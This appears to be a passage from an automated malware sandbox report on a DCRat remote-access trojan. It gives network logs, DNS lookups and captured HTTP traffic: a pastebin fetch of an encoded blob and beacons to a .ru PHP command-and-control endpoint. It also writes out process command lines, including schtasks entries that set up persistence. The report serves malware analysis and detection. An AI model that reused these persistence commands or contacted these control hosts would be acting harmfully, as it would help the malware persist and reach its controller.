                        Jan 2, 2025 06:37:09.629318953 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629343033 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629343033 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.629354000 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629364967 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629379034 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.629412889 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.629916906 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629928112 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629936934 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629961014 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629971981 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629977942 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.629990101 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.630000114 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.630003929 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.630026102 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.630057096 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.630074024 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.630085945 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.630095005 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.630140066 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.630575895 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.630585909 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.630635977 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.716044903 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.726186037 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:41.827274084 CET5185453192.168.2.4162.159.36.2
                        Jan 2, 2025 06:37:41.832123041 CET5351854162.159.36.2192.168.2.4
                        Jan 2, 2025 06:37:41.832190990 CET5185453192.168.2.4162.159.36.2
                        Jan 2, 2025 06:37:41.836972952 CET5351854162.159.36.2192.168.2.4
                        Jan 2, 2025 06:37:42.276918888 CET5185453192.168.2.4162.159.36.2
                        Jan 2, 2025 06:37:42.281934977 CET5351854162.159.36.2192.168.2.4
                        Jan 2, 2025 06:37:42.281994104 CET5185453192.168.2.4162.159.36.2

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 2, 2025 06:37:06.897604942 CET5816153192.168.2.41.1.1.1
                        Jan 2, 2025 06:37:06.904407024 CET53581611.1.1.1192.168.2.4
                        Jan 2, 2025 06:37:08.209214926 CET6523953192.168.2.41.1.1.1
                        Jan 2, 2025 06:37:08.366024971 CET53652391.1.1.1192.168.2.4
                        Jan 2, 2025 06:37:41.826673985 CET5352847162.159.36.2192.168.2.4
                        Jan 2, 2025 06:37:42.482296944 CET53584831.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 2, 2025 06:37:06.897604942 CET192.168.2.41.1.1.10x7eefStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                        Jan 2, 2025 06:37:08.209214926 CET192.168.2.41.1.1.10x1f35Standard query (0)a1068999.xsph.ruA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 2, 2025 06:37:06.904407024 CET1.1.1.1192.168.2.40x7eefNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                        Jan 2, 2025 06:37:06.904407024 CET1.1.1.1192.168.2.40x7eefNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                        Jan 2, 2025 06:37:06.904407024 CET1.1.1.1192.168.2.40x7eefNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                        Jan 2, 2025 06:37:08.366024971 CET1.1.1.1192.168.2.40x1f35No error (0)a1068999.xsph.ru141.8.192.164A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • pastebin.com
                        • a1068999.xsph.ru

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449731141.8.192.164807776C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe
                        TimestampBytes transferredDirectionData
                        Jan 2, 2025 06:37:08.372654915 CET500OUTGET /L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2&7f588507da462c66c8d7e4bf263478da=811e4ff91d24acd2ff809d0fba0acc36&c6a8234adf537449ee48f442440ce8cf=wMxMTZzImY1EzMiFmMzYWY1UmY5YjYlNGNlhTZ0IjM2YjY3MTOmdjM&dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2 HTTP/1.1
                        Accept: */*
                        Content-Type: text/csv
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                        Host: a1068999.xsph.ru
                        Connection: Keep-Alive
                        Jan 2, 2025 06:37:09.091468096 CET1236INHTTP/1.1 403 Forbidden
                        Server: openresty
                        Date: Thu, 02 Jan 2025 05:37:08 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Vary: Accept-Encoding
                        Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                        Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                        Jan 2, 2025 06:37:09.091480970 CET224INData Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                        Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inlin
                        Jan 2, 2025 06:37:09.091506004 CET1236INData Raw: 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d
                        Data Ascii: e-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wra
                        Jan 2, 2025 06:37:09.091550112 CET1236INData Raw: 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72
                        Data Ascii: webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-m
                        Jan 2, 2025 06:37:09.091562986 CET1236INData Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67
                        Data Ascii: t-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:a
                        Jan 2, 2025 06:37:09.091602087 CET1236INData Raw: 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20
                        Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p> <h1 c
                        Jan 2, 2025 06:37:09.091614008 CET1236INData Raw: 31 39 39 20 37 34 2e 36 30 32 20 31 38 39 2e 39 38 20 37 33 2e 30 37 34 33 43 31 39 33 2e 38 30 36 20 37 31 2e 39 32 38 36 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20
                        Data Ascii: 199 74.602 189.98 73.0743C193.806 71.9286 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.55
                        Jan 2, 2025 06:37:09.091639042 CET1120INData Raw: 34 2e 31 33 31 20 31 30 36 2e 31 30 38 20 31 33 34 2e 35 31 34 20 31 30 35 2e 37 32 36 43 31 33 37 2e 33 38 33 20 31 30 33 2e 34 33 35 20 31 34 30 2e 30 36 20 31 30 30 2e 39 35 32 20 31 34 32 2e 35 34 37 20 39 38 2e 34 36 39 38 43 31 34 33 2e 35
                        Data Ascii: 4.131 106.108 134.514 105.726C137.383 103.435 140.06 100.952 142.547 98.4698C143.503 97.515 142.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.
                        Jan 2, 2025 06:37:09.091650009 CET1236INData Raw: 33 30 38 2e 31 38 32 20 31 30 37 2e 34 34 36 20 33 30 39 2e 35 32 31 20 31 30 35 2e 37 32 38 43 33 30 39 2e 39 30 34 20 31 30 35 2e 31 35 35 20 33 30 39 2e 33 33 20 31 30 34 2e 32 20 33 30 38 2e 37 35 36 20 31 30 34 2e 32 43 33 30 35 2e 33 31 33
                        Data Ascii: 308.182 107.446 309.521 105.728C309.904 105.155 309.33 104.2 308.756 104.2C305.313 104.2 301.87 104.964 298.619 106.3C298.619 106.3 296.898 106.873 296.324 107.255C295.941 106.873 294.794 106.11 294.411 106.11C295.176 104.391 296.324 102.291 2
                        Jan 2, 2025 06:37:09.091660976 CET1116INData Raw: 20 31 33 32 2e 39 38 33 20 34 31 2e 39 35 30 32 43 31 33 30 2e 36 38 38 20 34 33 2e 32 38 36 39 20 31 32 38 2e 32 30 32 20 34 34 2e 36 32 33 35 20 31 32 35 2e 37 31 35 20 34 35 2e 39 36 30 32 43 31 32 33 2e 34 32 20 34 37 2e 32 39 36 39 20 31 32
                        Data Ascii: 132.983 41.9502C130.688 43.2869 128.202 44.6235 125.715 45.9602C123.42 47.2969 121.316 48.6335 118.83 49.2064C118.83 49.2064 117.108 48.4426 116.917 48.4426C101.233 45.7692 86.8885 48.4426 71.3961 51.3068C66.997 52.0706 62.4066 53.0254 58.007
                        Jan 2, 2025 06:37:09.096498966 CET1236INData Raw: 32 20 31 31 35 2e 30 38 34 20 33 32 2e 39 35 31 38 20 31 31 37 2e 39 34 38 20 33 32 2e 37 36 30 35 20 31 32 31 2e 31 39 35 43 33 32 2e 37 36 30 35 20 31 32 31 2e 31 39 35 20 33 32 2e 35 36 39 32 20 31 32 31 2e 31 39 35 20 33 32 2e 35 36 39 32 20
                        Data Ascii: 2 115.084 32.9518 117.948 32.7605 121.195C32.7605 121.195 32.5692 121.195 32.5692 121.004C28.9352 119.667 25.1099 119.094 21.2846 118.903C20.3283 118.903 19.372 118.903 18.4156 118.903C17.6506 118.903 16.8855 119.285 16.503 120.049C16.3117 120
                        Jan 2, 2025 06:37:09.418128014 CET476OUTGET /L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2&7f588507da462c66c8d7e4bf263478da=811e4ff91d24acd2ff809d0fba0acc36&c6a8234adf537449ee48f442440ce8cf=wMxMTZzImY1EzMiFmMzYWY1UmY5YjYlNGNlhTZ0IjM2YjY3MTOmdjM&dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2 HTTP/1.1
                        Accept: */*
                        Content-Type: text/csv
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                        Host: a1068999.xsph.ru
                        Jan 2, 2025 06:37:09.627397060 CET1236INHTTP/1.1 403 Forbidden
                        Server: openresty
                        Date: Thu, 02 Jan 2025 05:37:09 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Vary: Accept-Encoding
                        Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                        Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449730172.67.19.244437776C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe
                        TimestampBytes transferredDirectionData
                        2025-01-02 05:37:07 UTC166OUTGET /raw/GTMsT9mi HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                        Host: pastebin.com
                        Connection: Keep-Alive
                        2025-01-02 05:37:08 UTC388INHTTP/1.1 200 OK
                        Date: Thu, 02 Jan 2025 05:37:08 GMT
                        Content-Type: text/plain; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        x-frame-options: DENY
                        x-content-type-options: nosniff
                        x-xss-protection: 1;mode=block
                        cache-control: public, max-age=1801
                        CF-Cache-Status: MISS
                        Last-Modified: Thu, 02 Jan 2025 05:37:08 GMT
                        Server: cloudflare
                        CF-RAY: 8fb865388a4b80d3-EWR
                        2025-01-02 05:37:08 UTC404INData Raw: 31 38 64 0d 0a 50 54 31 52 5a 6b 42 52 52 6c 4a 48 56 6c 67 68 50 69 4d 6f 49 45 41 38 49 56 42 67 58 6a 42 4d 4d 53 4e 75 54 47 39 66 4a 53 6f 30 4c 53 41 6b 4c 53 68 45 4a 48 78 65 4b 58 34 6d 59 44 74 4d 50 6c 35 49 50 44 41 6d 4c 43 34 2b 4c 6b 42 2b 4c 69 4e 44 54 45 42 52 52 6c 4a 48 56 6c 67 68 50 69 4d 6f 49 45 41 38 49 56 42 67 58 6a 42 4d 4d 53 4e 75 54 47 39 66 4a 53 6f 30 4c 53 41 6b 4c 53 68 45 4a 48 78 65 4b 58 34 6d 59 44 74 4d 50 6c 35 49 50 44 41 6d 4c 43 34 2b 4c 69 42 2b 4c 69 4d 37 5a 51 3d 3d 2e 3d 3d 51 66 69 59 69 49 36 49 43 61 69 77 69 49 71 49 69 4f 69 4d 6d 49 73 49 53 4b 69 6f 6a 49 55 4a 43 4c 69 73 6a 49 36 49 53 65 69 77 69 49 41 4a 69 4f 69 6b 6d 49 73 49 69 4c 69 6f 6a 49 4a 4a 43 4c 69 45 69 49 36 49 79 56 69 77 69 49 38
                        Data Ascii: 18dPT1RZkBRRlJHVlghPiMoIEA8IVBgXjBMMSNuTG9fJSo0LSAkLShEJHxeKX4mYDtMPl5IPDAmLC4+LkB+LiNDTEBRRlJHVlghPiMoIEA8IVBgXjBMMSNuTG9fJSo0LSAkLShEJHxeKX4mYDtMPl5IPDAmLC4+LiB+LiM7ZQ==.==QfiYiI6ICaiwiIqIiOiMmIsISKiojIUJCLisjI6ISeiwiIAJiOikmIsIiLiojIJJCLiEiI6IyViwiI8
                        2025-01-02 05:37:08 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:00:36:55
                        Start date:02/01/2025
                        Path:C:\Users\user\Desktop\CRf9KBk4ra.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\CRf9KBk4ra.exe"
                        Imagebase:0x370000
                        File size:1'377'924 bytes
                        MD5 hash:8B7B1ADCB1EA8EDFF9888558EF898054
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:1
                        Start time:00:36:56
                        Start date:02/01/2025
                        Path:C:\Windows\SysWOW64\wscript.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\hyperBrowsermonitorNet\BYhHcZyz.vbe"
                        Imagebase:0x120000
                        File size:147'456 bytes
                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:00:36:58
                        Start date:02/01/2025
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\hyperBrowsermonitorNet\cyFyzmRWbIwTjqG.bat" "
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:3
                        Start time:00:36:58
                        Start date:02/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:00:36:58
                        Start date:02/01/2025
                        Path:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\hyperBrowsermonitorNet\serverwinCommon.exe"
                        Imagebase:0x50000
                        File size:1'060'864 bytes
                        MD5 hash:BB31080A1AC450BC92BE05ED245BBCEB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1697465797.0000000002537000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1697465797.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1698366349.00000000123B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 74%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:5
                        Start time:00:36:59
                        Start date:02/01/2025
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 5 /tr "'C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /f
                        Imagebase:0x7ff76f990000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:00:36:59
                        Start date:02/01/2025
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZg" /sc ONLOGON /tr "'C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f
                        Imagebase:0x7ff76f990000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:00:36:59
                        Start date:02/01/2025
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 6 /tr "'C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f
                        Imagebase:0x7ff76f990000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:00:36:59
                        Start date:02/01/2025
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\csrss.exe'" /f
                        Imagebase:0x7ff76f990000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:00:36:59
                        Start date:02/01/2025
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                        Imagebase:0x7ff76f990000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:10
                        Start time:00:36:59
                        Start date:02/01/2025
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                        Imagebase:0x7ff76f990000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:11
                        Start time:00:36:59
                        Start date:02/01/2025
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 6 /tr "'C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /f
                        Imagebase:0x7ff76f990000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:00:36:59
                        Start date:02/01/2025
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZg" /sc ONLOGON /tr "'C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f
                        Imagebase:0x7ff76f990000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
